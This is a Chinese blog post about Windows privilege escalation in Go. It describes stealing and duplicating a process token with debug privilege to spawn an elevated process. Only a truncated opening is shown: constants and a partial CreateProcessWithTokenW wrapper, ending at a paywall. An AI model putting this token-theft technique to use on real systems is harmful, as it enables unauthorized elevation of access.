golang实现windows提权

山与路

已于 2024-04-16 16:21:53 修改

阅读量812

点赞数 3

文章标签： golang windows stm32

于 2024-04-15 13:52:19 首次发布

本文链接：https://blog.youkuaiyun.com/a1309525802/article/details/137778377

版权

本文介绍了如何使用Go语言（golang）实现Windows环境下的提权操作，包括获取进程令牌、设置调试权限、复制令牌以及创建新进程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

golang实现windows提权

package main

import (
	"fmt"
	"syscall"
	"unsafe"

	"github.com/shirou/gopsutil/process"
	"golang.org/x/sys/windows"
)

const (
	TOKEN_ALL_ACCESS     = 0x000F01FF
	SE_PRIVILEGE_ENABLED = 0x00000002
	TOKEN_DUPLICATE      = 0x00000002
)

var (
	modadvapi32             = syscall.NewLazyDLL("advapi32.dll")
	createProcessWithTokenW = modadvapi32.NewProc("CreateProcessWithTokenW")
)

func CreateProcessWithTokenW(Token windows.Token,
	LogonFlags uint32,
	ApplicationName *uint16,
	CommandLine *uint16,
	CreationFlags uint32,
	Environment **uint16,
	CurrentDirectory *uint16,
	StartupInfo *windows.StartupInfo,
	ProcessInformation *windows.ProcessInformation) bool {

	r0, _, _ := createProcessWithTokenW.Call(
		uintptr(Token),
		uintptr(LogonFlags),
		uintptr(unsafe.Pointer(ApplicationName)),
		uintptr(unsafe.Pointer(Comma

最低0.47元/天解锁文章